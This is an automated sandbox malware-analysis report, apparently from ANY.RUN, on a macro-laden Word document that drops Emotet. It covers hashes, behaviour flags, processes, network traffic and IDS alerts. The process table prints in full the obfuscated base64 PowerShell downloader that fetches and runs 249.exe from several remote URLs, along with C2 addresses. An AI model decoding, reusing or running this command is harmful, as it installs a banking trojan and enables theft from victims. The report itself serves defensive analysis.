Malware analysis ogx7vtz2tr4j_8g5j473-096029329350379 Malicious activity

analyze malware

Huge database of samples and IOCs
Custom VM setup
Unlimited submissions
Interactive approach

Add for printing

download:	ogx7vtz2tr4j_8g5j473-096029329350379
Full analysis:	https://app.any.run/tasks/618daae0-3673-4956-9ad5-76f395ae7652
Verdict:	Malicious activity
Threats:	Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email. Malware Trends Tracker >>>
Analysis date:	October 09, 2019, 19:16:42
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:	macros macros-on-open generated-doc emotet trojan emotet-doc
Indicators:
MIME:	application/msword
File info:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Australian Dollar, Subject: Rubber, Author: Thalia Romaguera, Keywords: Bedfordshire, Comments: visionary, Template: Normal.dotm, Last Saved By: Nona Tremblay, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 9 17:49:00 2019, Last Saved Time/Date: Wed Oct 9 17:49:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 176, Security: 0
MD5:	9513B1D4CC78349DAD3C20151118EAFF
SHA1:	7B63D465E84D2A4961E69C69464B807500C9AEEB
SHA256:	FD8C3FCF8CA04DDD17F6FB7F7A6463912E6F33BFAF27E765188887FDE52686F0
SSDEEP:	6144:mRIR/1OyR5Iocj3x/iEm/6/iIJ8MiRdZZb3tpTkPSP/bd8bijiH8pk4FiLW46di1:mRIR/1OyR5Iocj3x/iEm/6/iIJ8MiRdg

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 300 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: 240 seconds
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 8.0.7601.17514 undefined
Adobe Acrobat Reader DC MUI (15.023.20070)
Adobe Flash Player 26 ActiveX (26.0.0.131)
Adobe Flash Player 26 NPAPI (26.0.0.131)
Adobe Flash Player 26 PPAPI (26.0.0.131)
Adobe Refresh Manager (1.8.0)
CCleaner (5.35)
FileZilla Client 3.36.0 (3.36.0)
Google Chrome (75.0.3770.100)
Google Update Helper (1.3.34.7)
Java 8 Update 92 (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.7.2 (4.7.03062)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
Mozilla Firefox 68.0.1 (x86 en-US) (68.0.1)
Notepad++ (32-bit x86) (7.5.1)
Opera 12.15 (12.15.1748)
Skype version 8.29 (8.29)
Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
VLC media player (2.2.6)
WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

Client LanguagePack Package
Client Refresh LanguagePack Package
CodecPack Basic Package
Foundation Package
IE Troubleshooters Package
InternetExplorer Optional Package
KB2534111
KB2999226
KB4019990
KB976902
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
ProfessionalEdition
UltimateEdition

Add for printing

MALICIOUS
- Application was dropped or rewritten from another process
  - 249.exe (PID: 2472)
  - 249.exe (PID: 3664)
  - msptermsizes.exe (PID: 2380)
  - msptermsizes.exe (PID: 920)
- Emotet process was detected
  - 249.exe (PID: 2472)
- Changes the autorun value in the registry
  - msptermsizes.exe (PID: 920)
  - CCleaner.exe (PID: 3596)
- EMOTET was detected
  - msptermsizes.exe (PID: 920)
- Connects to CnC server
  - msptermsizes.exe (PID: 920)
- Loads the Task Scheduler COM API
  - CCleaner.exe (PID: 2648)
  - CCleaner.exe (PID: 3596)
- Actions looks like stealing of personal data
  - CCleaner.exe (PID: 3380)
  - CCleaner.exe (PID: 3596)
SUSPICIOUS
- Creates files in the user directory
  - powershell.exe (PID: 3112)
  - CCleaner.exe (PID: 3380)
  - vlc.exe (PID: 3884)
- Executed via WMI
  - powershell.exe (PID: 3112)
- PowerShell script executed
  - powershell.exe (PID: 3112)
- Executable content was dropped or overwritten
  - powershell.exe (PID: 3112)
  - 249.exe (PID: 2472)
- Application launched itself
  - 249.exe (PID: 3664)
  - msptermsizes.exe (PID: 2380)
  - CCleaner.exe (PID: 3380)
- Starts itself from another location
  - 249.exe (PID: 2472)
- Executed via COM
  - DllHost.exe (PID: 3920)
- Reads internet explorer settings
  - CCleaner.exe (PID: 3380)
  - CCleaner.exe (PID: 3596)
- Reads the cookies of Mozilla Firefox
  - CCleaner.exe (PID: 3380)
- Executed via Task Scheduler
  - CCleaner.exe (PID: 3380)
- Low-level read access rights to disk partition
  - CCleaner.exe (PID: 3380)
- Reads the cookies of Google Chrome
  - CCleaner.exe (PID: 3380)
- Creates files in the program directory
  - AdobeARM.exe (PID: 3000)
INFO
- Creates files in the user directory
  - WINWORD.EXE (PID: 2800)
- Reads Microsoft Office registry keys
  - WINWORD.EXE (PID: 2800)
- Manual execution by user
  - wmplayer.exe (PID: 2488)
  - WinRAR.exe (PID: 3796)
  - explorer.exe (PID: 3388)
  - AcroRd32.exe (PID: 1868)
  - CCleaner.exe (PID: 2648)
  - vlc.exe (PID: 3884)
  - chrome.exe (PID: 2880)
- Reads settings of System Certificates
  - powershell.exe (PID: 3112)
  - CCleaner.exe (PID: 3380)
  - chrome.exe (PID: 936)
- Application launched itself
  - RdrCEF.exe (PID: 3532)
  - chrome.exe (PID: 2880)
- Reads the hosts file
  - RdrCEF.exe (PID: 3532)
  - chrome.exe (PID: 936)
  - chrome.exe (PID: 2880)
- Changes settings of System certificates
  - chrome.exe (PID: 936)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.doc	\|	Microsoft Word document (54.2)
.doc	\|	Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType:	Microsoft Word 97-2003 Document
CompObjUserTypeLen:	32
Manager:	Schroeder
HeadingPairs:	Title 1
TitleOfParts:	-
HyperlinksChanged:	No
SharedDoc:	No
LinksUpToDate:	No
ScaleCrop:	No
AppVersion:	16
CharCountWithSpaces:	205
Paragraphs:	1
Lines:	1
Company:	Marks - Kassulke
CodePage:	Windows Latin 1 (Western European)
Security:	None
Characters:	176
Words:	30
Pages:	1
ModifyDate:	2019:10:09 16:49:00
CreateDate:	2019:10:09 16:49:00
TotalEditTime:	-
Software:	Microsoft Office Word
RevisionNumber:	1
LastModifiedBy:	Nona Tremblay
Template:	Normal.dotm
Comments:	visionary
Keywords:	Bedfordshire
Author:	Thalia Romaguera
Subject:	Rubber
Title:	Australian Dollar

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

101

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
2800	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\ogx7vtz2tr4j_8g5j473-096029329350379.doc"	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	—	explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000
3112	powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABjADEANgA1AGIAOAAwADAANAAyADAAPQAnAGMAMgA1AGIANwAwADcANgA4AGMAOAAnADsAJAB4ADMAeABjADkAOQA1ADQAOAAwAHgAIAA9ACAAJwAyADQAOQAnADsAJAB4ADUANQAxADEANwAwADcANwA2ADUAYgA9ACcAYgA4AHgAMQBiADgAMABjADAANwAyADIAMAAnADsAJABjAGMAYgAyAGIAMAA2ADAAeAAwADEAYwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAeAAzAHgAYwA5ADkANQA0ADgAMAB4ACsAJwAuAGUAeABlACcAOwAkAHgAMAAxAGMAMgAwADQAMABiADYANQA9ACcAYwAwADgANQAyADAAYwAwAGIANABjACcAOwAkAGMAYgA3ADAAeAAzADkAYgA2ADAAOAA5AHgAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAG4AZQBUAC4AdwBFAGIAQwBMAGkARQBOAHQAOwAkAGIAMABjADAAOQA5ADIAMAA2ADQAeAAxADAAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBzAG8AcAByAGUAdAB0AHkAaABhAGkAcgBsAGwAYwAuAGMAbwBtAC8AdwBlAGwAYwBvAG0AZQAyAC8AaQByAGMAWQBkAGoAZQB3AFAAdAAvAEAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AegBoAGkAegBhAGkAcwBpAGYAYQBuAGcALgBjAG8AbQAvAGYAdQBuAGMAdABpAG8AbgAuAGYAZQBuAGMAZQAvAGQATABqAFAAVAB6AHkAbAAvAEAAaAB0AHQAcAA6AC8ALwBmAHUAdAB1AHIAZQAtAG0AYQBpAG4AdABlAG4AYQBuAGMAZQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAEQARABiAFYAYwBMAFAAdgB6AC8AQABoAHQAdABwAHMAOgAvAC8AaQBtAHQAZwBsAG8AYgBhAGwAcwAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwA1ADMAZQBmADAAdQA3AGYAbABfADQAeQAzAG0AeABtAGIAMABmAC0ANQA0AC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AdgBhAHMAdAB1AHYAaQBkAHkAYQBhAHIAYwBoAGkAdABlAGMAdABzAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBNAFgAUQB4AGcARgBaAEUALwAnAC4AIgBTAFAATABgAGkAdAAiACgAJwBAACcAKQA7ACQAYwA2ADAAMAAwADkAMwAzADYANwAxADAAPQAnAGMAOQAwADkANwA1ADcANgAwADAAMAAwADAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGIAMAAwADAAMQAwADkANgA4ADQAOAAgAGkAbgAgACQAYgAwAGMAMAA5ADkAMgAwADYANAB4ADEAMAApAHsAdAByAHkAewAkAGMAYgA3ADAAeAAzADkAYgA2ADAAOAA5AHgALgAiAGQAbwBXAE4ATABgAG8AYQBgAEQARgBJAGwARQAiACgAJABiADAAMAAwADEAMAA5ADYAOAA0ADgALAAgACQAYwBjAGIAMgBiADAANgAwAHgAMAAxAGMAKQA7ACQAYwA2AHgAMAAwAHgAMAB4AGMANwAwAD0AJwB4ADMANAA1AHgAeAAxADIAYwA5ADYAMAAwACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQAYwBjAGIAMgBiADAANgAwAHgAMAAxAGMAKQAuACIATABFAE4AYABHAGAAVABoACIAIAAtAGcAZQAgADIANgA0ADAAMAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYABBAFIAdAAiACgAJABjAGMAYgAyAGIAMAA2ADAAeAAwADEAYwApADsAJAB4ADAAOQB4AHgANgBiAGMAYgA1ADAAeAA4AD0AJwBjADgAOAAzADcANgAzADAAMABiAHgAJwA7AGIAcgBlAGEAawA7ACQAYgBiADAAOQAyAGIAeAA3AHgAMAAwADgAMgA9ACcAYgBjAGMANwAzADcAOQBiADEAMAAwADQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAYwAwAHgAOAAyADgAeAA2AGIAMAA3AD0AJwBjADAAMAA4ADMAMwAwADIAMAAwADQANgAnAA==	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe		wmiprvse.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2488	"C:\Program Files\Windows Media Player\wmplayer.exe" /prefetch:1	C:\Program Files\Windows Media Player\wmplayer.exe	—	explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Media Player Exit code: 0 Version: 12.0.7600.16385 (win7_rtm.090713-1255)
3512	"C:\Program Files\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files\Windows Media Player\wmplayer.exe" /prefetch:1	C:\Program Files\Windows Media Player\setup_wm.exe	—	wmplayer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Windows Media Configuration Utility Exit code: 0 Version: 12.0.7600.16385 (win7_rtm.090713-1255)
3388	"C:\Windows\explorer.exe"	C:\Windows\explorer.exe	—	explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3796	"C:\Program Files\WinRAR\WinRAR.exe"	C:\Program Files\WinRAR\WinRAR.exe	—	explorer.exe
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0
3664	"C:\Users\admin\249.exe"	C:\Users\admin\249.exe	—	powershell.exe
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1
2472	--11c0a8b5	C:\Users\admin\249.exe		249.exe
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1
2380	"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe"	C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe	—	249.exe
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1
920	--f91b2738	C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe		msptermsizes.exe
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Version: 1, 0, 0, 1

Add for printing

Total events

3 632

Read events

2 791

Write events

Delete events

Modification events

No data

Add for printing

Executable files

Suspicious files

Text files

238

Unknown types

Dropped files

PID	Process	Filename		Type
2800	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\CVR4E8A.tmp.cvr		—
		MD5:—	SHA256:—
3112	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZGF4BADJWZ403UU38XTF.temp		—
		MD5:—	SHA256:—
2800	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm		pgc
		MD5:58362D3A772A98306A3BD83CCCF74366	SHA256:464DECF6DD8B425AAEC8B237EE31236D61E78153935E52CD8026C87DC381FE82
1360	AcroRd32.exe	C:\Users\admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal		—
		MD5:—	SHA256:—
2800	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\72766F55.wmf		wmf
		MD5:AD3E990B1A08FEABF8B973BC06E21B7D	SHA256:97E06BE3DB9C67F970CE07CADC3A87CA7D4FA39D42C09DEC6FD6F3404427D36B
1360	AcroRd32.exe	C:\Users\admin\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt16.lst.1360		—
		MD5:—	SHA256:—
2800	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\~$x7vtz2tr4j_8g5j473-096029329350379.doc		pgc
		MD5:0CC4DB92EFE00875B91A7A646DBB2FEC	SHA256:2625B7F506BB4AC43670E6AF584F7325A305DE1CB8DCC0EFEEFF10FEB5F9097E
2800	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16528F71.wmf		wmf
		MD5:39AD55F8B482E33398A3A39349235A33	SHA256:7EA0E7820BB08BB0C3FED87B90E5762FADE38ECFA1B5051317E00C38B5812B13
2800	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd		tlb
		MD5:89EAD3F2F95C3CD84E7FB7AE27F9B509	SHA256:543B4910F26D36D170D4ABF0E8F90C61D809A667B7D35A636A9082A4E720A03F
2800	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9614EBE.wmf		wmf
		MD5:49C5D718F641C17D725BD20C4DE3C461	SHA256:C957EBE630668E014AB6BA4346E6F5368873D72E3280405D61395E926EE6A0F0

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
3380	CCleaner.exe	GET	301	151.101.0.64:80	http://www.piriform.com/auto?a=0&p=cc&v=5.35.6210&l=1033&lk=&mk=IJR6-W5SV-5KYR-QBZD-6BY4-RN5Z-WAV9-RVK2-VJCA&o=6.1W3&au=1&mx=97B7721C4994E2556FF6A439510F665DB45337A341A47E15F4997584423BF714&gu=00000000-0000-4000-8000-d6f7f2be5127	US	—	—	whitelisted
1868	AcroRd32.exe	GET	304	2.16.186.97:80	http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/279_15_23_20070.zip	unknown	—	—	whitelisted
936	chrome.exe	GET	204	172.217.26.35:80	http://csi.gstatic.com/csi?v=3&s=gapi_module&action=gapi_iframes__googleapis_cli12&it=mli.27,mei.5&tbsrt=725&tran=15&e=abc_l0,abc_m0,abc_pgapi_iframes__googleapis_cli12,abc_u0&rt=	US	—	—	whitelisted
936	chrome.exe	GET	302	172.217.18.174:80	http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvOTRmQUFXVHlhaGJaUTdMLWtCSkNJUl9ZQQ/1.0.0.5_nmmhkkegccagdldgiimedpiccmgmieda.crx	US	html	509 b	whitelisted
1868	AcroRd32.exe	GET	304	2.16.186.97:80	http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/280_15_23_20070.zip	unknown	—	—	whitelisted
1868	AcroRd32.exe	GET	304	2.16.186.97:80	http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/message.zip	unknown	—	—	whitelisted
1868	AcroRd32.exe	GET	304	2.16.186.97:80	http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/281_15_23_20070.zip	unknown	—	—	whitelisted
1868	AcroRd32.exe	GET	304	2.16.186.97:80	http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/277_15_23_20070.zip	unknown	—	—	whitelisted
920	msptermsizes.exe	POST	200	198.199.114.69:8080	http://198.199.114.69:8080/taskbar/vermont/ringin/merge/	US	binary	132 b	malicious
920	msptermsizes.exe	POST	—	23.239.29.211:443	http://23.239.29.211:443/health/free/	US	—	—	malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
1868	AcroRd32.exe	2.16.186.97:80	acroipm2.adobe.com	Akamai International B.V.	—	whitelisted
3380	CCleaner.exe	151.101.0.64:80	www.piriform.com	Fastly	US	whitelisted
3112	powershell.exe	47.110.40.3:443	www.zhizaisifang.com	—	CN	unknown
—	—	151.101.0.64:443	www.piriform.com	Fastly	US	whitelisted
920	msptermsizes.exe	198.199.114.69:8080	—	Digital Ocean, Inc.	US	malicious
1868	AcroRd32.exe	2.21.36.203:443	armmf.adobe.com	GTT Communications Inc.	FR	suspicious
3380	CCleaner.exe	151.101.2.202:443	www.ccleaner.com	Fastly	US	suspicious
3380	CCleaner.exe	151.101.0.64:443	www.piriform.com	Fastly	US	whitelisted
3112	powershell.exe	45.56.100.50:443	www.soprettyhairllc.com	Linode, LLC	US	unknown
3112	powershell.exe	45.56.100.50:80	www.soprettyhairllc.com	Linode, LLC	US	unknown

DNS requests

Domain	IP	Reputation
www.soprettyhairllc.com	45.56.100.50	unknown
www.zhizaisifang.com	47.110.40.3	unknown
acroipm2.adobe.com	2.16.186.97 2.16.186.57	whitelisted
armmf.adobe.com	2.21.36.203	whitelisted
www.piriform.com	151.101.0.64 151.101.64.64 151.101.128.64 151.101.192.64	whitelisted
www.ccleaner.com	151.101.2.202 151.101.66.202 151.101.130.202 151.101.194.202	whitelisted
ardownload2.adobe.com	2.18.233.74	whitelisted
clientservices.googleapis.com	172.217.16.163	whitelisted
accounts.google.com	172.217.16.141	shared
www.google.com.ua	172.217.16.131	whitelisted

Threats

PID	Process	Class	Message
920	msptermsizes.exe	A Network Trojan was detected	AV TROJAN W32/Emotet CnC Checkin (Apr 2019)
920	msptermsizes.exe	A Network Trojan was detected	MALWARE [PTsecurity] Feodo/Emotet
920	msptermsizes.exe	Potentially Bad Traffic	ET POLICY HTTP traffic on port 443 (POST)
920	msptermsizes.exe	A Network Trojan was detected	MALWARE [PTsecurity] Feodo/Emotet

7 ETPRO signatures available at the full report

Add for printing

Process	Message
vlc.exe	core libvlc: Running vlc with the default interface. Use 'cvlc' to use vlc without interface.

General Info

ogx7vtz2tr4j_8g5j473-096029329350379

9513B1D4CC78349DAD3C20151118EAFF

7B63D465E84D2A4961E69C69464B807500C9AEEB

FD8C3FCF8CA04DDD17F6FB7F7A6463912E6F33BFAF27E765188887FDE52686F0

6144:mRIR/1OyR5Iocj3x/iEm/6/iIJ8MiRdZZb3tpTkPSP/bd8bijiH8pk4FiLW46di1:mRIR/1OyR5Iocj3x/iEm/6/iIJ8MiRdg

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Application was dropped or rewritten from another process

Emotet process was detected

Changes the autorun value in the registry

EMOTET was detected

Connects to CnC server

Loads the Task Scheduler COM API

Actions looks like stealing of personal data

SUSPICIOUS

Creates files in the user directory

Executed via WMI

PowerShell script executed

Executable content was dropped or overwritten

Application launched itself

Starts itself from another location

Executed via COM

Reads internet explorer settings

Reads the cookies of Mozilla Firefox

Executed via Task Scheduler

Low-level read access rights to disk partition

Reads the cookies of Google Chrome

Creates files in the program directory

INFO

Creates files in the user directory

Reads Microsoft Office registry keys

Manual execution by user

Reads settings of System Certificates

Application launched itself

Reads the hosts file

Changes settings of System certificates

Malware configuration

Static information

TRiD

EXIF

FlashPix

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings